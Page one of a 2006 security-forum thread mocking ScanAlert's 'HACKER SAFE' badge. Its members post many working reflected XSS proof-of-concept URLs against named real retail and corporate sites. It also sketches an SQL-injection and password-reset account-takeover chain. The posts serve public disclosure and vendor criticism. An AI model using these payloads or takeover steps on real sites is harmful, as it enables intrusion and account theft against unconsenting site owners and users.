Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: 123Next
Current Page: 1 of 3
Hacker safe!
Posted by: Kyran
Date: November 09, 2006 10:12AM

Yup. Hackers are perfectly safe at those sites. ;)

http://www.ex24.com/glo_marketwatch.jsp?symb=%22%3E%3Cscript%3Ealert('hacker%20safe!')%3C/script%3E

- Kyran

Options: ReplyQuote
Re: Hacker safe!
Posted by: thomaspollet
Date: November 09, 2006 10:18AM

from fd thread :

http://www.tritonhealth.com/cgi-bin/category.cgi?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.usenext.com/UseNextDE/ShopInt/misc/miscShowNewsgroups.cfm?SNUUID=CC8A8130-E00E-2063-874892F19C7A185D&1163072824024%22%3E%3Cscript%3Ealert(1)%3C/script%3E&

Options: ReplyQuote
Re: Hacker safe!
Posted by: Kyran
Date: November 09, 2006 10:27AM

http://cpwstore.carpartswholesale.com/year_model.php?make_text=Acura&year=1986%3C/title%3E%3Cscript%3Ealert('xss')%3C/script%3E&x=37&y=10

- Kyran

Options: ReplyQuote
Re: Hacker safe!
Posted by: Kyran
Date: November 09, 2006 10:41AM

http://www.shopperschoice.com/index.html?sstring=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&a-filterDeptPost=0&action=search&x=0&y=0

- Kyran

Options: ReplyQuote
Re: Hacker safe!
Posted by: Kyran
Date: November 09, 2006 10:49AM

http://www.lifesourcewater.com/search.html?search=%3Cscript%3Ealert(1337);%3C/script%3E

- Kyran

Options: ReplyQuote
Re: Hacker safe!
Posted by: Kyran
Date: November 09, 2006 10:59AM

Jumped out of javascript.
http://www.nativeremedies.com/hbx-searchscript.php?query=%22%3B%3C%2Fscript%3Exss%3Cscript%3Ealert(1337)%3C/script%3E&SEARCH=Go&index=407607&calln=2&lastq=%2B%5C%2522%3E%3Cxss%3E&opt=ALL

- Kyran

Options: ReplyQuote
Re: Hacker safe!
Posted by: Kyran
Date: November 09, 2006 11:08AM

http://search.hardwarestore.com/?query=%3C/title%3E%22%3B%3C%2Fscript%3E%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&x=0&y=0

http://www.maxwigs.com/index.php?search_in=all&p=catalog&mode=search&search_str=%22+%2F%3Exss%3Cscript%3Ealert%281337%29%3C%2Fscript%3E&searchsubmit.x=0&searchsubmit.y=0

- Kyran

Options: ReplyQuote
Re: Hacker safe!
Posted by: rsnake
Date: November 09, 2006 11:29AM

I don't see the problem here. Clearly ScanAlert feels that XSS isn't a problem. I love the text on their page:

Quote



This site is tested and certified daily to pass the FBI/SANS Internet Security Test. The "live" HACKER SAFE mark appears only when a web site's security meets the highest security scanning standards of the U.S. government, Visa, MasterCard, American Express, Discover and JCB.

Sites free of all known vulnerabilities that can be remotely scanned for, such as those earning HACKER SAFE certification, prevent over 99.99% of hacker crime.

This information is intended as a relative indication of the security efforts of this web site and its operators. While this, or any other, vulnerability testing cannot and does not guarantee security; it does show that www.hardwarestore.com meets all payment card industry guidelines for remote web server vulnerability testing to help protect your personal information from hackers. HACKER SAFE does not mean hacker proof. HACKER SAFE certification cannot and does not protect any of your data that may be shared with other servers that are not certified HACKER SAFE, such as credit card processing networks or offline data storage, nor does it protect you from other ways your data may be illegally obtained such as non-hacker "insider" access to it. While ScanAlert makes reasonable efforts to assure its certification service is functioning properly, ScanAlert makes no warranty or claim of any kind, whatsoever, about the accuracy or usefulness of any information provided herein. By using this information you agree that ScanAlert shall be held harmless in any event.


That last part is great. We don't promise anything. I guess the "highest standard" of security needs some work.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Hacker safe!
Posted by: jungsonn
Date: November 09, 2006 12:35PM

if not safe. = i'ts not safe.

how can one promise 99% if that 1% is an open window and stay credible?
Why not scan for that also?

A few sites had SQL holes in it, whereby one could obtain access to all the users.
What is that 99%? i think all sites are close to 99% "hack0R safe" then.

Seems just a bubble, a false sense of security.

Options: ReplyQuote
Re: Hacker safe!
Posted by: jungsonn
Date: November 09, 2006 12:43PM

Like:

inject sql -> steal users from a db -> go to their email -> try to login -> collect all sensitive info

Yep safe.



Edited 1 time(s). Last edit at 11/18/2006 11:42AM by jungsonn.

Options: ReplyQuote
Re: Hacker safe!
Posted by: rsnake
Date: November 09, 2006 01:02PM

A lot of times it's easier than the "browse for creditcard data in emails" part. Just look for emails from sites they have accessed in the past and use the forgot password function to gain access to those accounts.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Hacker safe!
Posted by: jungsonn
Date: November 10, 2006 12:59AM

Yes,

Just like a common mistake in cryptography people tend to make, there is no 99%, not even 10% security. or 1%. If it is 99% secure, and the weak link is the 1%, that 1% means that the whole chain/system is 1% secure basicly, because it failed/compromised the 99%. And could even weaken a system, anyone determined enough and with the tools can access any system.

But my biggest argument against labeling those sites "hacker safe", is that it's users may think: oh it's safe, i can go ruthless about now. Not considering, that in this digital world there are only weak links in the chain.

Options: ReplyQuote
Re: Hacker safe!
Posted by: jungsonn
Date: November 10, 2006 04:42AM

Some first HACKER SAFEĀ© finds from "so it begins" thread:

Maluc:
http://www.hackersafe.com/error/msg.jsp?msg=Haxxored

Jungsonn:

Send them a mail with a click:
http://www.hackersafe.com/site/en/merchants/moreinfo/?send=Y&interest=technology

Yay!, it sure does help such hacker safe logo.
http://www.dvdempire.com/Exec/v5_search_item.asp?userid=99365065948345&string=%22%3E%3Cscript%3Ealert%28%27hacker+safe%21%27%29%3B%3C%2Fscript%3E%3C%22&site_media_id=&site_id=4&pp=&used=0
http://www.goldnutritionstore.com/cgi-bin/category.cgi?query=%22%3E%3Cscript%3Ealert('H4cK0r%20Safe!!%20really,%20we%20truely%20are%20hacker%20safe,%20see%20the%20green%20logo.')%3C/script%3E%3C%22

Options: ReplyQuote
Re: Hacker safe!
Posted by: jungsonn
Date: November 10, 2006 04:57AM

INFO:
http://www.scanalert.com/site/en/technology/howwescan/

Quote


Step3

Web application testing is the third phase of ScanAlert's daily security audit, and perhaps the most important. According to analyst firm Gartner Group, an estimated 70% of all security breaches today are due to vulnerabilities within the web application layer. Traditional security mechanisms such as firewalls and IDS' provide little or no protection against attacks on your web applications. During this testing phase, all HTTP services and virtual domains are checked for the existence of potentially dangerous modules, configurations settings, CGIs and other scripts, and default installed files. The web site is then "deep crawled," including flash embedded links and password protected pages, to find forms and other potentially dangerous "interactive elements." These are then exercised in specific ways to disclose any application-level vulnerabilities such as code revelation, cross-site scripting and SQL injection. Both generic and software specific tests are performed in order to uncover misconfigurations and coding error vulnerabilities.

This three phase approach to vulnerability auditing enables us to perform more accurate audits with less load on your servers. It also enables us to run any single test or test phase on a target to detect changes, test specific ports or vulnerabilities, or run web application only tests on multiple web sites residing on a single server.

So everythings fails on step 3, my advise for clients of hacker safe: Demand your money back, and like RSnake said on his blog: let a specialist vouch for this kind of security/protection.

Options: ReplyQuote
Re: Hacker safe!
Posted by: fogez
Date: November 10, 2006 11:16AM

http://www.lnt.com/registry/index.jsp?step=search&type=name&firstName=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E&lastName=s

Options: ReplyQuote
Re: Hacker safe!
Posted by: Kyran
Date: November 10, 2006 02:25PM

Okay. Time for some more high profile sites listed in the latest DR article. http://www.darkreading.com/document.asp?doc_id=110363&WT.svl=news1_1

http://www.gnc.com/search/noResults.jsp?kw=%3Cscript%3Ealert('Hacker%20safe?');%3C/script%3E

- Kyran

Options: ReplyQuote
Re: Hacker safe!
Posted by: Kyran
Date: November 10, 2006 02:27PM

Had to break out of a comment for this one. http://www.jnj.com/search/search_results.htm?criteria=%20--%3E%20%3Cscript%3Ealert('xss')%3C/script%3E112&Find.x=40&Find.y=10

- Kyran

Options: ReplyQuote
Re: Hacker safe!
Posted by: Kyran
Date: November 10, 2006 02:45PM

http://extsearch.worldbank.org/servlet/SiteSearchServlet?qUrl=&qSubc=wbg&ed=&q=%22%20onMouseover=%22alert('xss');&submit.x=19&submit.y=11

Move your mouse pretty much anywhere. It gets outputted on several places.

- Kyran

Options: ReplyQuote
Re: Hacker safe!
Posted by: thomaspollet
Date: November 10, 2006 03:57PM

https://www.adorama.com/catalog.tpl?op=process&func=Login&xemail=%3Cscript%3Ealert('hack3r%20safe!')%3C/script%3E

Options: ReplyQuote
Re: Hacker safe!
Posted by: WhiteAcid
Date: November 10, 2006 04:15PM

https://www.homesecuritystore.com/ezStore123/DTCheckOut1.asp?orderid=360071&customerid= << then insert any html tag as the first name and submit. I can't be arsed to make a PoC. My GM script can't do it as I think the form is created dynamically so it doesn't know the structure of the form.
http://estore.e-academy.com/index.cfm?loc=support/auto_support/main_support&parentID=17&type2ID=24&CFID=728729&CFTOKEN=3825%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
http://www.pictureline.com/navigation.php?cid=145%22%3E%3Cscript%3Ealert(1337)%3C/script%3E
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.laptopbatteries.com/search.asp&search=<SCRIPT>alert(1337)</SCRIPT> << laptopbatteries.com
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.londonpass.com/search2.asp&search=<SCRIPT>alert('XSS')</SCRIPT>&search_button=&Form_Submited=1 << londonpass.com
http://www.homevisions.com/hvprod/SearchResultsdynamic.asp?searchfield=%22%0aalert('xss')//
http://www.homeannex.com/SearchI.asp?query=asdf--!%3E<script>alert('xss')</script>&imageField2.x=0&imageField2.y=0
http://www.buywirelessnow.com/utstarcom/do/search/searchProduct?search=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&searchType=All+Words&searchField=Common+Search+Fields

This is not directly a flaw, but a very interesting error page: http://www.condomdepot.com/product/search.cfm?criteria=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&submit=Go

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer



Edited 3 time(s). Last edit at 11/10/2006 04:25PM by WhiteAcid.

Options: ReplyQuote
Re: Hacker safe!
Posted by: thomaspollet
Date: November 10, 2006 04:19PM

http://www.restorationhardware.com/rh/search/search_results.jsp?refineByValue=%3C/script%3E%3Cscript%3Ealert('b00')%3C/script%3EBath%3ABath+Hardware%3ATowel+Bars+%26+Tissue+Holders&link=refineby

Options: ReplyQuote
Re: Hacker safe!
Posted by: maluc
Date: November 10, 2006 05:10PM

the damned forum won't let me link this without encoding.
so copy/paste yourself

]http://www.nike.com/nikewomen/index.jsp?X';}alert('XSS');if(1==1){x='x

-maluc



Edited 1 time(s). Last edit at 11/10/2006 05:11PM by maluc.

Options: ReplyQuote
Re: Hacker safe!
Posted by: jungsonn
Date: November 10, 2006 06:18PM

*in quote mode now*

Quote

Daniel Patterson, lead Webmaster for Shoppers Choice, says his company has since corrected the XSS vulnerability on its site and will be looking for other potential bugs. "It was surprising -- we thought we had fixed the problem a while back," Patterson says. "It is also surprising that Hacker Safe apparently had not notified us of a seemingly popular method for XSS."

Yeah right, better give the money you spend @ hackersafe to a good webdeveloper i'dd say.

Wow:

Quote

ScanAlert has some big-name Hacker Safe customers: A&E Television Networks, Ace Hardware, American Red Cross, Fidelity National Financial, General Nutrition Centers, HP, Johnson & Johnson, NIKE, Northrop Grumman, PETCO, Ritz Camera, Sony, The Sports Authority, The World Bank, U-Haul, Visa, Warner Brothers, and Yahoo. None of these companies were found to have vulnerabilities by sla.ckers.org.

Game on?

Options: ReplyQuote
Re: Hacker safe!
Posted by: jungsonn
Date: November 10, 2006 06:33PM

Quote

"We are all just doing this on the side," says "Kyran," a member of Sla.ckers group. "There is no targeted or unified effort. Rather scary isn't it? A small group of people doing this in their spare time, finding so many XSS vulns. It really makes you wonder what the real bad guys are doing."

I do it while i sleep, just tapping some keys now and then, no rocket science. and sometimes i hire 13 monkeys to do the "hard XSS stuff", 'cuzz i'm lazy.

Options: ReplyQuote
Re: Hacker safe!
Posted by: jungsonn
Date: November 10, 2006 06:35PM

@muluc, what does that xss thingy do on NIKE? got a live example?

Options: ReplyQuote
Re: Hacker safe!
Posted by: rsnake
Date: November 10, 2006 06:45PM

Super funky that the forums don't allow you to enter straight tags. Sorry about that. But it's partly Nike's implementation where they don't change URL encoding to the ASCII equivalent. This is sort of a unique case. Cutting and pasting works:
Quote

www.nike.com/nikewomen/index.jsp?X';}alert('XSS');if(1==1){x='x

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Hacker safe!
Posted by: jungsonn
Date: November 10, 2006 07:09PM

Ghehe nice one! sla.ckers is back on the map again (if it ever was off it) ;)

Options: ReplyQuote
Re: Hacker safe!
Posted by: rsnake
Date: November 11, 2006 01:06AM

I don't recall it ever being off any map, but yes, we have some of the best web app sec minds in the industry watching and/or contributing. I'm pretty happy with the people we've got on this board, personally.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Hacker safe!
Posted by: jungsonn
Date: November 11, 2006 03:15AM

Yes there surely are, it was a mere joke to darkreading.com who said like: "None of these companies were found to have vulnerabilities by sla.ckers.org." seems that maluc already found 4 of the list, meh Yahoo doesn't count :]

btw RSnsake, are there many lurkers on the board? i do notice however sincie i began to post here i get traffic on my business site from microsoft, google.com etc. all sleeping giants visiting poor little me, still nothing to be found on my site rather then being analysed, logged, profiled and stored ;)

Options: ReplyQuote
Re: Hacker safe!
Posted by: rsnake
Date: November 11, 2006 03:21AM

It's difficult to tell for sure, but we definitely have about 50% lurkers on the board and a large amount above and beyond that haven't bothered to sign up for an account. The actual percentages are a little up in the air, but yes, there are way more people reading than posting.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Pages: 123Next
Current Page: 1 of 3


Sorry, only registered users may post in this forum.